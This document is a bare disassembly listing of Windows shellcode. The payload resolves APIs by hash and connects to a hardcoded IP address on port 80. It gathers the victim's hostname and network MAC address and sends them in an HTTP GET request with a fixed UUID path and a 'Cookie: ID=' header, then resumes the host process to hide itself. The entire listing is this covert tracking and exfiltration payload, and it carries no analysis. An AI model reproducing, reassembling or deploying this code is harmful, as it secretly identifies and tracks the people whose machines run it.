seg000:00000000 ; Segment type: Pure code seg000:00000000 seg000 segment byte public 'CODE' use32 seg000:00000000 assume cs:seg000 seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing seg000:00000000 pusha seg000:00000001 cld seg000:00000002 call sub_91 seg000:00000007 pusha seg000:00000008 mov ebp, esp seg000:0000000A xor edx, edx seg000:0000000C mov edx, fs:[edx+30h] seg000:00000010 mov edx, [edx+0Ch] seg000:00000013 mov edx, [edx+14h] seg000:00000016 seg000:00000016 loc_16: ; CODE XREF: seg000:0000008Ej seg000:00000016 mov esi, [edx+28h] seg000:00000019 movzx ecx, word ptr [edx+26h] seg000:0000001D xor edi, edi seg000:0000001F seg000:0000001F loc_1F: ; CODE XREF: seg000:0000002Dj seg000:0000001F xor eax, eax seg000:00000021 lodsb seg000:00000022 cmp al, 61h ; 'a' seg000:00000024 jl short loc_28 seg000:00000026 sub al, 20h ; ' ' seg000:00000028 seg000:00000028 loc_28: ; CODE XREF: seg000:00000024j seg000:00000028 ror edi, 0Dh seg000:0000002B add edi, eax seg000:0000002D loop loc_1F seg000:0000002F push edx seg000:00000030 push edi seg000:00000031 mov edx, [edx+10h] seg000:00000034 mov eax, [edx+3Ch] seg000:00000037 add eax, edx seg000:00000039 mov eax, [eax+78h] seg000:0000003C test eax, eax seg000:0000003E jz short loc_8A seg000:00000040 add eax, edx seg000:00000042 push eax seg000:00000043 mov ecx, [eax+18h] seg000:00000046 mov ebx, [eax+20h] seg000:00000049 add ebx, edx seg000:0000004B seg000:0000004B loc_4B: ; CODE XREF: seg000:00000067j seg000:0000004B jecxz short loc_89 seg000:0000004D dec ecx seg000:0000004E mov esi, [ebx+ecx*4] seg000:00000051 add esi, edx seg000:00000053 xor edi, edi seg000:00000055 seg000:00000055 loc_55: ; CODE XREF: seg000:0000005Fj seg000:00000055 xor eax, eax seg000:00000057 lodsb seg000:00000058 ror edi, 0Dh seg000:0000005B add edi, eax seg000:0000005D cmp al, ah seg000:0000005F jnz short loc_55 seg000:00000061 add edi, [ebp-8] seg000:00000064 cmp edi, [ebp+24h] seg000:00000067 jnz short loc_4B seg000:00000069 pop eax seg000:0000006A mov ebx, [eax+24h] seg000:0000006D add ebx, edx seg000:0000006F mov cx, [ebx+ecx*2] seg000:00000073 mov ebx, [eax+1Ch] seg000:00000076 add ebx, edx seg000:00000078 mov eax, [ebx+ecx*4] seg000:0000007B add eax, edx seg000:0000007D mov [esp+24h], eax seg000:00000081 pop ebx seg000:00000082 pop ebx seg000:00000083 popa seg000:00000084 pop ecx seg000:00000085 pop edx seg000:00000086 push ecx seg000:00000087 jmp eax seg000:00000089 ; --------------------------------------------------------------------------- seg000:00000089 seg000:00000089 loc_89: ; CODE XREF: seg000:loc_4Bj seg000:00000089 pop eax seg000:0000008A seg000:0000008A loc_8A: ; CODE XREF: seg000:0000003Ej seg000:0000008A pop edi seg000:0000008B pop edx seg000:0000008C mov edx, [edx] seg000:0000008E jmp short loc_16 seg000:0000008E ; --------------------------------------------------------------------------- seg000:00000090 dbCnt db 5 seg000:00000091 seg000:00000091 ; =============== S U B R O U T I N E ======================================= seg000:00000091 seg000:00000091 seg000:00000091 sub_91 proc near ; CODE XREF: seg000:00000002p seg000:00000091 pop ebp seg000:00000092 cmp dword ptr [ebp+2E9h], 20544547h seg000:0000009C jnz short loc_10E seg000:0000009E lea eax, [ebp+2D1h] ; 0x2d8, ws2_32 seg000:000000A4 push eax seg000:000000A5 push 726774Ch ; LoadLibraryA_salt seg000:000000AA call ebp seg000:000000AC test eax, eax seg000:000000AE jz short loc_10E seg000:000000B0 lea eax, [ebp+2D8h] ; 0x2df,IPHLPAPI seg000:000000B6 push eax seg000:000000B7 push 726774Ch ; LoadLibraryA_salt seg000:000000BC call ebp seg000:000000BE test eax, eax seg000:000000C0 jz short loc_10E seg000:000000C2 mov ebx, 190h seg000:000000C7 sub esp, ebx seg000:000000C9 push esp seg000:000000CA push ebx seg000:000000CB push 6B8029h ; WSAStartup_salt seg000:000000D0 call ebp seg000:000000D2 add esp, ebx seg000:000000D4 test eax, eax seg000:000000D6 jnz short loc_10E seg000:000000D8 push eax seg000:000000D9 push eax seg000:000000DA push eax seg000:000000DB push eax seg000:000000DC inc eax seg000:000000DD push eax seg000:000000DE inc eax seg000:000000DF push eax seg000:000000E0 push 0E0DF0FEAh ; WSASocketA_salt seg000:000000E5 call ebp seg000:000000E7 xor ebx, ebx seg000:000000E9 not ebx seg000:000000EB cmp ebx, eax seg000:000000ED jz short loc_10E seg000:000000EF mov ebx, eax seg000:000000F1 seg000:000000F1 loc_F1: ; CODE XREF: sub_91+7Bj seg000:000000F1 push 10h seg000:000000F3 lea esi, [ebp+2E1h] seg000:000000F9 push esi seg000:000000FA push ebx seg000:000000FB push 6174A599h ; connect_salt seg000:00000100 call ebp seg000:00000102 test eax, eax seg000:00000104 jz short loc_125 seg000:00000106 dec byte ptr [ebp+89h] ; dbCnt seg000:0000010C jnz short loc_F1 seg000:0000010E seg000:0000010E loc_10E: ; CODE XREF: sub_91+Bj seg000:0000010E ; sub_91+1Dj ... seg000:0000010E cmp byte ptr [ebp+24Fh], 1 seg000:00000115 jz short loc_11E seg000:00000117 call sub_257 seg000:0000011C jmp short loc_123 seg000:0000011E ; --------------------------------------------------------------------------- seg000:0000011E seg000:0000011E loc_11E: ; CODE XREF: sub_91+84j seg000:0000011E call sub_270 seg000:00000123 seg000:00000123 loc_123: ; CODE XREF: sub_91+8Bj seg000:00000123 jmp edi seg000:00000125 ; --------------------------------------------------------------------------- seg000:00000125 seg000:00000125 loc_125: ; CODE XREF: sub_91+73j seg000:00000125 mov eax, 100h seg000:0000012A sub esp, eax seg000:0000012C mov edx, esp seg000:0000012E push edx seg000:0000012F push eax seg000:00000130 push edx seg000:00000131 push 1DE49B6h ; gethostname_salt seg000:00000136 call ebp seg000:00000138 pop edi seg000:00000139 add esp, 100h seg000:0000013F test eax, eax seg000:00000141 jnz loc_239 seg000:00000147 push edi seg000:00000148 call sub_246 seg000:0000014D pop esi seg000:0000014E mov edx, ecx seg000:00000150 lea edi, [ebp+2E9h] seg000:00000156 call sub_246 seg000:0000015B dec edi seg000:0000015C cmp edx, 20h ; ' ' seg000:0000015F jl short loc_166 seg000:00000161 mov edx, 20h ; ' ' seg000:00000166 seg000:00000166 loc_166: ; CODE XREF: sub_91+CEj seg000:00000166 mov ecx, edx seg000:00000168 push esi seg000:00000169 rep movsb seg000:0000016B mov ecx, 0Dh seg000:00000170 lea esi, [ebp+2C4h] seg000:00000176 rep movsb seg000:00000178 mov [ebp+24Bh], edi seg000:0000017E pop esi seg000:0000017F push esi seg000:00000180 push 803428A9h ; gethostbyname_salt seg000:00000185 call ebp seg000:00000187 test eax, eax seg000:00000189 jz loc_239 seg000:0000018F mov cx, [eax+0Ah] seg000:00000193 cmp cx, 4 seg000:00000197 jb loc_239 seg000:0000019D lea eax, [eax+0Ch] seg000:000001A0 mov eax, [eax] seg000:000001A2 mov ecx, [eax] seg000:000001A4 mov ecx, [ecx] seg000:000001A6 mov eax, 100h seg000:000001AB push eax seg000:000001AC mov edi, esp seg000:000001AE sub esp, eax seg000:000001B0 mov esi, esp seg000:000001B2 push edi seg000:000001B3 push esi seg000:000001B4 push ecx seg000:000001B5 push ecx seg000:000001B6 push 0B8D27248h ; SendARP_salt seg000:000001BB call ebp seg000:000001BD test eax, eax seg000:000001BF add esp, 104h seg000:000001C5 movzx ecx, word ptr [edi] seg000:000001C8 cmp ecx, 6 seg000:000001CB jb short loc_239 seg000:000001CD mov ecx, 6 seg000:000001D2 mov eax, 10h seg000:000001D7 sub esp, eax seg000:000001D9 mov edi, esp seg000:000001DB mov edx, ecx seg000:000001DD shl edx, 1 seg000:000001DF push eax seg000:000001E0 push edx seg000:000001E1 seg000:000001E1 loc_1E1: ; CODE XREF: sub_91+17Aj seg000:000001E1 xor edx, edx seg000:000001E3 mov dl, [esi] seg000:000001E5 mov al, dl seg000:000001E7 and al, 0F0h seg000:000001E9 shr al, 4 seg000:000001EC cmp al, 9 seg000:000001EE ja short loc_1F4 seg000:000001F0 add al, 30h ; '0' seg000:000001F2 jmp short loc_1F6 seg000:000001F4 ; --------------------------------------------------------------------------- seg000:000001F4 seg000:000001F4 loc_1F4: ; CODE XREF: sub_91+15Dj seg000:000001F4 add al, 37h ; '7' seg000:000001F6 seg000:000001F6 loc_1F6: ; CODE XREF: sub_91+161j seg000:000001F6 mov [edi], al seg000:000001F8 inc edi seg000:000001F9 mov al, dl seg000:000001FB and al, 0Fh seg000:000001FD cmp al, 9 seg000:000001FF ja short loc_205 seg000:00000201 add al, 30h ; '0' seg000:00000203 jmp short loc_207 seg000:00000205 ; --------------------------------------------------------------------------- seg000:00000205 seg000:00000205 loc_205: ; CODE XREF: sub_91+16Ej seg000:00000205 add al, 37h ; '7' seg000:00000207 seg000:00000207 loc_207: ; CODE XREF: sub_91+172j seg000:00000207 mov [edi], al seg000:00000209 inc edi seg000:0000020A inc esi seg000:0000020B loop loc_1E1 seg000:0000020D pop ecx seg000:0000020E sub edi, ecx seg000:00000210 mov esi, edi seg000:00000212 pop eax seg000:00000213 add esp, eax seg000:00000215 mov edi, [ebp+24Bh] seg000:0000021B rep movsb seg000:0000021D mov byte ptr [ebp+24Fh], 1 seg000:00000224 call sub_257 seg000:00000229 xor eax, eax seg000:0000022B push eax seg000:0000022C push ecx seg000:0000022D sub edi, ecx seg000:0000022F dec edi seg000:00000230 push edi seg000:00000231 push ebx seg000:00000232 push 5F38EBC2h ; send_salt seg000:00000237 call ebp seg000:00000239 seg000:00000239 loc_239: ; CODE XREF: sub_91+B0j seg000:00000239 ; sub_91+F8j ... seg000:00000239 push ebx seg000:0000023A push 614D6E75h ; closesocket_salt seg000:0000023F call ebp seg000:00000241 jmp loc_10E seg000:00000241 sub_91 endp ; sp-analysis failed seg000:00000241 seg000:00000246 seg000:00000246 ; =============== S U B R O U T I N E ======================================= seg000:00000246 seg000:00000246 seg000:00000246 sub_246 proc near ; CODE XREF: sub_91+B7p seg000:00000246 ; sub_91+C5p ... seg000:00000246 xor ecx, ecx seg000:00000248 not ecx seg000:0000024A xor eax, eax seg000:0000024C repne scasb seg000:0000024E not ecx seg000:00000250 dec ecx seg000:00000251 retn seg000:00000251 sub_246 endp seg000:00000251 seg000:00000251 ; --------------------------------------------------------------------------- seg000:00000252 db 0 seg000:00000253 db 0 seg000:00000254 db 0 seg000:00000255 db 0 seg000:00000256 db 0 seg000:00000257 seg000:00000257 ; =============== S U B R O U T I N E ======================================= seg000:00000257 seg000:00000257 seg000:00000257 sub_257 proc near ; CODE XREF: sub_91+86p seg000:00000257 ; sub_91+193p seg000:00000257 lea edi, [ebp+2E9h] seg000:0000025D call sub_246 seg000:00000262 dec edi seg000:00000263 mov ecx, 4Fh ; 'O' seg000:00000268 lea esi, [ebp+275h] seg000:0000026E rep movsb seg000:0000026E sub_257 endp ; sp-analysis failed seg000:0000026E seg000:00000270 seg000:00000270 ; =============== S U B R O U T I N E ======================================= seg000:00000270 seg000:00000270 seg000:00000270 sub_270 proc near ; CODE XREF: sub_91:loc_11Ep seg000:00000270 lea edi, [ebp+2E9h] seg000:00000276 call sub_246 seg000:0000027B retn seg000:0000027B sub_270 endp seg000:0000027B seg000:0000027B ; --------------------------------------------------------------------------- seg000:0000027C aConnectionKeep db 0Dh,0Ah seg000:0000027C db 'Connection: keep-alive',0Dh,0Ah seg000:0000027C db 'Accept: */*',0Dh,0Ah seg000:0000027C db 'Accept-Encoding: gzip',0Dh,0Ah seg000:0000027C db 0Dh,0Ah,0 seg000:000002BD ; --------------------------------------------------------------------------- seg000:000002BD add edi, 0Eh seg000:000002C0 xor ecx, ecx seg000:000002C2 not ecx seg000:000002C4 xor eax, eax seg000:000002C6 repe scasb seg000:000002C8 dec edi seg000:000002C9 jmp edi seg000:000002C9 ; --------------------------------------------------------------------------- seg000:000002CB aCookieId db 0Dh,0Ah seg000:000002CB db 'Cookie: ID=' seg000:000002D8 aWs2_32 db 'ws2_32',0 seg000:000002DF aIphlpapi db 'IPHLPAPI',0 seg000:000002E8 dd 50000002h seg000:000002EC dd 36CADE41h seg000:000002F0 aGet05cea4de951 db 'GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1',0Dh,0Ah seg000:000002F0 db 'Host: ',0 seg000:0000032B db 0